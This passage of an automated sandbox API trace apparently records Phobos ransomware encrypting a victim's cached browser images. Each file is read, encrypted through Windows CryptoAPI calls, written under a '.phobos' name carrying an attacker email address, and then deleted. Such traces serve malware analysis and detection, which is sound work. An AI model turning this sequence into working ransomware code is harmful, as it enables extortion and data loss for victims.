pdwDataLen=0x2a0fa80*=0xab0) returned 1 [0179.250] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xab0, lpOverlapped=0x0) returned 1 [0179.251] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0179.251] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.251] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.251] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.251] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.251] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.251] CloseHandle (hObject=0x17c) returned 1 [0179.251] CloseHandle (hObject=0x15c) returned 1 [0179.251] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg")) returned 1 [0179.252] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.253] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1920) returned 1 [0179.253] CloseHandle (hObject=0x15c) returned 1 [0179.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg")) returned 0x2020 [0179.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.253] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.253] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.253] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.253] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.253] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x780, lpOverlapped=0x0) returned 1 [0179.454] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x790, dwBufLen=0x790 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x790) returned 1 [0179.454] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x790, lpOverlapped=0x0) returned 1 [0179.455] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0179.455] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.455] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.455] CryptDestroyKey (hKey=0xa32c68) returned 1 [0179.455] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.455] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.455] CloseHandle (hObject=0x15c) returned 1 [0179.455] CloseHandle (hObject=0x17c) returned 1 [0179.455] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg")) returned 1 [0179.456] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.457] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=12150) returned 1 [0179.457] CloseHandle (hObject=0x17c) returned 1 [0179.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg")) returned 0x2020 [0179.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.457] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.457] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.458] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.458] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.458] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2f76, lpOverlapped=0x0) returned 1 [0179.474] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f80, dwBufLen=0x2f80 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f80) returned 1 [0179.475] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2f80, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2f80, lpOverlapped=0x0) returned 1 [0179.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0179.475] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.475] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.476] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.476] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.476] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.476] CloseHandle (hObject=0x17c) returned 1 [0179.476] CloseHandle (hObject=0x15c) returned 1 [0179.476] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg")) returned 1 [0179.477] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.481] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2567) returned 1 [0179.481] CloseHandle (hObject=0x15c) returned 1 [0179.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg")) returned 0x2020 [0179.482] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.482] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.482] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.482] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.482] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.482] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa07, lpOverlapped=0x0) returned 1 [0179.501] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa10, dwBufLen=0xa10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa10) returned 1 [0179.501] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa10, lpOverlapped=0x0) returned 1 [0179.502] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0179.502] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.502] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.502] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.502] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.502] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.502] CloseHandle (hObject=0x15c) returned 1 [0179.502] CloseHandle (hObject=0x17c) returned 1 [0179.503] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg")) returned 1 [0179.504] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.505] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6757) returned 1 [0179.505] CloseHandle (hObject=0x17c) returned 1 [0179.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg")) returned 0x2020 [0179.505] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.505] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.505] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.506] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.506] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.506] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1a65, lpOverlapped=0x0) returned 1 [0179.511] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a70, dwBufLen=0x1a70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a70) returned 1 [0179.511] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1a70, lpOverlapped=0x0) returned 1 [0179.513] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.513] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.513] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.513] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.513] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.513] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.513] CloseHandle (hObject=0x17c) returned 1 [0179.513] CloseHandle (hObject=0x15c) returned 1 [0179.513] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg")) returned 1 [0179.514] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.515] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=23109) returned 1 [0179.515] CloseHandle (hObject=0x15c) returned 1 [0179.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg")) returned 0x2020 [0179.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 